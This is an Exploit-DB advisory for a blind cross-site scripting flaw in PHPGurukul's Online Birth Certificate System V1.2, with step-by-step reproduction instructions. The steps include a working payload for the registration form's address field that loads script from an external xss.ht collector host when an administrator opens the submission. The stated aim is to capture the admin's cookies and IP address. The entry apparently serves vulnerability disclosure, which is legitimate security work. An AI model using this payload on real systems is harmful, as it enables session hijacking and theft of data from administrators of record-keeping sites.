PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS

EDB-ID:

51061

CVE:

N/A




Platform:

PHP

Date:

2023-03-25


Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP



Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.

#POC's

https://ibb.co/kSxFp2g 
https://ibb.co/VvSVRsy  
https://ibb.co/mSGp4FX 
https://ibb.co/hXbJ9TZ 
https://ibb.co/M6vS08S